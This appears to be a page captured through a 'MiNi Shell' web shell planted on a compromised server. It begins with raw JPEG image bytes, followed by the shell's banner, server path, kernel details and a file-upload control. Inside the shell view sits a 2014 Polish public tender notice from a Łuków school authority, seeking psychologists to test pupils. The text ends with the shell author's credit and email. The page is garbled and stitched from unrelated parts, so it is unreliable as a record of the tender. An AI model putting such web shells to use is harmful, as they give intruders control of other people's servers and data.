JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140904/189381-N-2014.html

<p class="kh_header"><b>Łuków: Zakup usług doradczych w zakresie przeprowadzenia dla uczniów (Uczestników Projektu) testów predyspozycji i deficytów z indywidualnym omówieniem wyników badań oraz sugestiami dla nauczycieli i rodziców odnośnie indywidualnej pracy z dzieckiem w ramach projektu Edukacja kluczem do lepszego życia.</b><br>
<b>Numer ogłoszenia: 189381 - 2014; data zamieszczenia: 04.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zespół Oświatowy , ul. Świderska 12, 21-400 Łuków, woj. lubelskie, tel. 25 798 24 40, faks 25 798 24 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gzolukow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług doradczych w zakresie przeprowadzenia dla uczniów (Uczestników Projektu) testów predyspozycji i deficytów z indywidualnym omówieniem wyników badań oraz sugestiami dla nauczycieli i rodziców odnośnie indywidualnej pracy z dzieckiem w ramach projektu Edukacja kluczem do lepszego życia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług doradczych w zakresie przeprowadzenia dla uczniów (Uczestników Projektu) testów predyspozycji i deficytów z indywidualnym omówieniem wyników badań oraz sugestiami dla nauczycieli i rodziców odnośnie indywidualnej pracy z dzieckiem w ramach realizacji projektu pn. Edukacja kluczem do lepszego życia współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
1.1.	W ramach realizacji przedmiotu zamówienia, do podstawowych obowiązków Wykonawcy należy:
a)	Przeprowadzenie badania psychologicznego osobowości i inteligencji dla każdego ucznia w ramach badania (poniższe testy składają się na test predyspozycji i deficytów i w dalszej części SIWZ będą nazywane: test predyspozycji i deficytów):
a.	przeprowadzenie badania Osobowości i Zainteresowań dla uczniów z podstawówki;
b.	przeprowadzenie Testów Osobowości i Zainteresowań dla uczniów z gimnazjum narzędziem E. Mittenecker, 
c.	przeprowadzenia Testów Matryc Ravena- w wersji standard dla uczniów z gimnazjum i podstawówki;
d.	przeprowadzenie Testów Matryc Ravena- w wersji plus dla uczniów z gimnazjum i podstawówki, którzy osiągnęli wysoki wynik w teście matryc w wersji standard;
b)	sporządzenie wyników badania każdego ucznia w formie raportu;
c)	sporządzenie sugestii dla nauczycieli i rodziców odnośnie indywidualnej pracy z dzieckiem;
d)	uzgadnianie z kierownikiem projektu wszelkich zmian w realizacji planu zajęć wynikających z zaistniałych ważnych powodów;
e)	systematyczne prowadzenie dokumentacji związanej z realizacją przedmiotu zamówienia;
f)	terminowe przekazywanie dokumentacji projektowej do Biura Projektu;
g)	udostępnianie dyrektorowi szkoły oraz kierownikowi projektu na żądanie, prowadzonej dokumentacji związanej z realizacją przedmiotu zamówienia;
h)	informowanie o stanie realizacji przedmiotu zamówienia na wniosek Zamawiającego, kierownika projektu, Instytucji Pośredniczącej i innych osób uprawnionych do nadzoru
Szkoła Podstawowa w Gołąbkach - 91 osób, Indywidualne przeprowadzenie testów predyspozycji i deficytów z każdym uczestnikiem projektu z osobna (3h z każdym uczestnikiem projektu, pomiędzy poszczególnymi testami powinna być zaplanowana min. 10 minutowa przerwa) oraz indywidualnym omówieniem wyników badań z rodzicami, na życzenie rodziców z wychowawcą (tj. każdorazowo 2h) oraz sugestiami dla nauczycieli i rodziców odnośnie indywidualnej pracy z dzieckiem. W tym również opracowanie indywidualnego raportu dla każdego uczestnika projektu. Raport nie może być generowany automatycznie/ elektronicznie, każdy musi zawierać min. 10 str. (czcionka 12, Times New Roman, interlinia 1,5) Wszystkie materiały muszą być dostarczone w formie trwale spiętego wydruku i elektronicznej. Przeprowadzenie testu, opracowanie wyników, omówienie wyników powinno być zrealizowane do 31 października 2014r. Kierownik projektu (koordynator projektu) ma prawo sprawdzić autentyczność materiałów do badania. Oprócz całej dokumentacji wykonawca musi przedłożyć dodatkowo listy obecności z uczestnictwa w badaniu podpisane przez dziecko (lub wychowawcę szkolnego) oraz listy obecności z uczestnictwa w omówieniu wyników badania podpisane przez rodzica/opiekuna prawnego. Wszystkie materiały muszą zostać wykonane zgodnie z etyczno-metodologicznymi standardami prowadzenia badań i sporządzania diagnoz psychologicznych. Zamawiający ma prawo do kontroli poprawności realizacji zamówienia w trakcie jego wykonywania. 
Gimnazjum w Gołąbkach - 96 osób - Indywidualne przeprowadzenie testów predyspozycji i deficytów z każdym uczestnikiem projektu z osobna (3h z każdym uczestnikiem projektu, pomiędzy poszczególnymi testami powinna być zaplanowana min. 10 minutowa przerwa) oraz indywidualnym omówieniem wyników badań z rodzicami, na życzenie rodziców z wychowawcą (tj. każdorazowo 2h) oraz sugestiami dla nauczycieli i rodziców odnośnie indywidualnej pracy z dzieckiem. W tym również opracowanie indywidualnego raportu dla każdego uczestnika projektu. Raport nie może być generowany automatycznie/ elektronicznie, każdy musi zawierać min. 10 str. (czcionka 12, Times New Roman, interlinia 1,5) Wszystkie materiały muszą być dostarczone w formie trwale spiętego wydruku i elektronicznej. Przeprowadzenie testu, opracowanie wyników, omówienie wyników powinno być zrealizowane do 31 października 2014 r. Kierownik projektu (koordynator projektu) ma prawo sprawdzić autentyczność materiałów do badania. Oprócz całej dokumentacji wykonawca musi przedłożyć dodatkowo listy obecności z uczestnictwa w badaniu podpisane przez dziecko (lub wychowawcę szkolnego) oraz listy obecności z uczestnictwa w omówieniu wyników badania podpisane przez rodzica/opiekuna prawnego. Wszystkie materiały muszą zostać wykonane zgodnie z etyczno-metodologicznymi standardami prowadzenia badań i sporządzania diagnoz psychologicznych. Zamawiający ma prawo do kontroli poprawności realizacji zamówienia w trakcie jego wykonywania.
Szkoła Podstawowa w Krynkach - 88 osób - Indywidualne przeprowadzenie testów predyspozycji i deficytów z każdym uczestnikiem projektu z osobna (3h z każdym uczestnikiem projektu, pomiędzy poszczególnymi testami powinna być zaplanowana min. 10 minutowa przerwa) oraz indywidualnym omówieniem wyników badań z rodzicami, na życzenie rodziców z wychowawcą (tj. każdorazowo 2h) oraz sugestiami dla nauczycieli i rodziców odnośnie indywidualnej pracy z dzieckiem. W tym również opracowanie indywidualnego raportu dla każdego uczestnika projektu. Raport nie może być generowany automatycznie/ elektronicznie, każdy musi zawierać min. 10 str. (czcionka 12, Times New Roman, interlinia 1,5) Wszystkie materiały muszą być dostarczone w formie trwale spiętego wydruku i elektronicznej. Przeprowadzenie testu, opracowanie wyników, omówienie wyników powinno być zrealizowane do 31 października 2014r. Kierownik projektu (koordynator projektu) ma prawo sprawdzić autentyczność materiałów do badania. Oprócz całej dokumentacji wykonawca musi przedłożyć dodatkowo listy obecności z uczestnictwa w badaniu podpisane przez dziecko (lub wychowawcę szkolnego) oraz listy obecności z uczestnictwa w omówieniu wyników badania podpisane przez rodzica/opiekuna prawnego. Wszystkie materiały muszą zostać wykonane zgodnie z etyczno-metodologicznymi standardami prowadzenia badań i sporządzania diagnoz psychologicznych. Zamawiający ma prawo do kontroli poprawności realizacji zamówienia w trakcie jego wykonywania.
Gimnazjum w Krynkach - 89 osób - Indywidualne przeprowadzenie testów predyspozycji i deficytów z każdym uczestnikiem projektu z osobna (3h z każdym uczestnikiem projektu, pomiędzy poszczególnymi testami powinna być zaplanowana min. 10 minutowa przerwa) oraz indywidualnym omówieniem wyników badań z rodzicami, na życzenie rodziców z wychowawcą (tj. każdorazowo 2h) oraz sugestiami dla nauczycieli i rodziców odnośnie indywidualnej pracy z dzieckiem. W tym również opracowanie indywidualnego raportu dla każdego uczestnika projektu. Raport nie może być generowany automatycznie/ elektronicznie, każdy musi zawierać min. 10 str. (czcionka 12, Times New Roman, interlinia 1,5) Wszystkie materiały muszą być dostarczone w formie trwale spiętego wydruku i elektronicznej. Przeprowadzenie testu, opracowanie wyników, omówienie wyników powinno być zrealizowane do 31 października 2014r. Kierownik projektu (koordynator projektu) ma prawo sprawdzić autentyczność materiałów do badania. Oprócz całej dokumentacji wykonawca musi przedłożyć dodatkowo listy obecności z uczestnictwa w badaniu podpisane przez dziecko (lub wychowawcę szkolnego) oraz listy obecności z uczestnictwa w omówieniu wyników badania podpisane przez rodzica/opiekuna prawnego. Wszystkie materiały muszą zostać wykonane zgodnie z etyczno-metodologicznymi standardami prowadzenia badań i sporządzania diagnoz psychologicznych. Zamawiający ma prawo do kontroli poprawności realizacji zamówienia w trakcie jego wykonywania.
Szkoła Podstawowa w Rolach - 66 osób-Indywidualne przeprowadzenie testów predyspozycji i deficytów z każdym uczestnikiem projektu z osobna (3h z każdym uczestnikiem projektu, pomiędzy poszczególnymi testami powinna być zaplanowana min. 10 minutowa przerwa) oraz indywidualnym omówieniem wyników badań z rodzicami, na życzenie rodziców z wychowawcą (tj. każdorazowo 2h) oraz sugestiami dla nauczycieli i rodziców odnośnie indywidualnej pracy z dzieckiem. W tym również opracowanie indywidualnego raportu dla każdego uczestnika projektu. Raport nie może być generowany automatycznie/ elektronicznie, każdy musi zawierać min. 10 str. (czcionka 12, Times New Roman, interlinia 1,5) Wszystkie materiały muszą być dostarczone w formie trwale spiętego wydruku i elektronicznej. Przeprowadzenie testu, opracowanie wyników, omówienie wyników powinno być zrealizowane do 31 października 2014r. Kierownik projektu (koordynator projektu) ma prawo sprawdzić autentyczność materiałów do badania. Oprócz całej dokumentacji wykonawca musi przedłożyć dodatkowo listy obecności z uczestnictwa w badaniu podpisane przez dziecko (lub wychowawcę szkolonego) oraz listy obecności z uczestnictwa w omówieniu wyników badania podpisane przez rodzica/opiekuna prawnego. Wszystkie materiały muszą zostać wykonane zgodnie z etyczno-metodologicznymi standardami prowadzenia badań i sporządzania diagnoz psychologicznych. Zamawiający ma prawo do kontroli poprawności realizacji zamówienia w trakcie jego wykonywania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6, 85.31.23.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunków nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału  w postępowaniu, określonych w art. 22 ust. 1 pkt 1 ustawy Pzp (wzór oświadczenia stanowi załącznik nr 2 do SIWZ), zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunków nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 2 ustawy Pzp (wzór oświadczenia stanowi załącznik nr 2 do SIWZ), z uwzględnieniem informacji zawartych w dokumencie wymienionym w Rozdziale 7 pkt 1.7. SIWZ (o ile wykonawca składa taki dokument), zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunków nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 3 ustawy Pzp (wzór oświadczenia stanowi załącznik nr 2 do SIWZ) oraz w oparciu o informacje zawarte w dokumencie wymienionym w Rozdziale 7 pkt 1.7. SIWZ (o ile wykonawca składa taki dokument) i w dokumencie wymienionym w Rozdziale 7 pkt 1.6., tj. o udzielenie zamówienia mogą ubiegać się Wykonawcy dysponujący odpowiednim potencjałem technicznym.
W zakresie warunków wskazanych w punkcie 1.3. ocena spełnienia warunków nastąpi zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy dysponujący osobami zdolnymi do wykonania zamówienia, które spełniają nw. wymagania w zakresie posiadania niezbędnych kwalifikacji zawodowych, doświadczenia i wykształcenia: 
a) wykształcenie wyższe magisterskie w zakresie psychologii oraz co najmniej dwuletnie doświadczenie zawodowe w zakresie doradztwa psychologicznego,
b) lub wykształcenie wyższe magisterskie na innym kierunku i ukończone studia podyplomowe w zakresie psychologii oraz co najmniej dwuletnie doświadczenie zawodowe w zakresie doradztwa psychologicznego.
W zakresie warunków wskazanych w punkcie 1.3. ocena spełnienia warunków nastąpi zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 4 ustawy Pzp (wzór oświadczenia stanowi załącznik nr 2 do SIWZ), z uwzględnieniem informacji zawartych w dokumencie wymienionym w Rozdziale 7 pkt 1.7 SIWZ (o ile wykonawca składa taki dokument), zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
1) Zamawiający dopuszcza zmianę osoby wskazanej w ofercie w Załączniku -Wykaz osób, która będzie uczestniczyć w wykonywaniu zamówienia, na osobę spełniającą wymagania określone w SIWZ jedynie w formie pisemnej, w przypadkach wystąpienia sytuacji losowych udokumentowanych przez Wykonawcę tylko i wyłącznie za pisemną zgodą Zamawiającego;
2)	W przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;
3) Dopuszcza się aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gzolukow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Oświatowy w Łukowie
21-400 Łuków, Świderska 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2014 godzina 08:00, miejsce: Gminny Zespół Oświatowy w Łukowie
21-400 Łuków, Świderska 12
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup usług doradczych w zakresie przeprowadzenia dla uczniów (Uczestników Projektu) testów predyspozycji i deficytów z indywidualnym omówieniem wyników badań oraz sugestiami dla nauczycieli i rodziców odnośnie indywidualnej pracy z dzieckiem w ramach projektu Edukacja kluczem do lepszego życia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com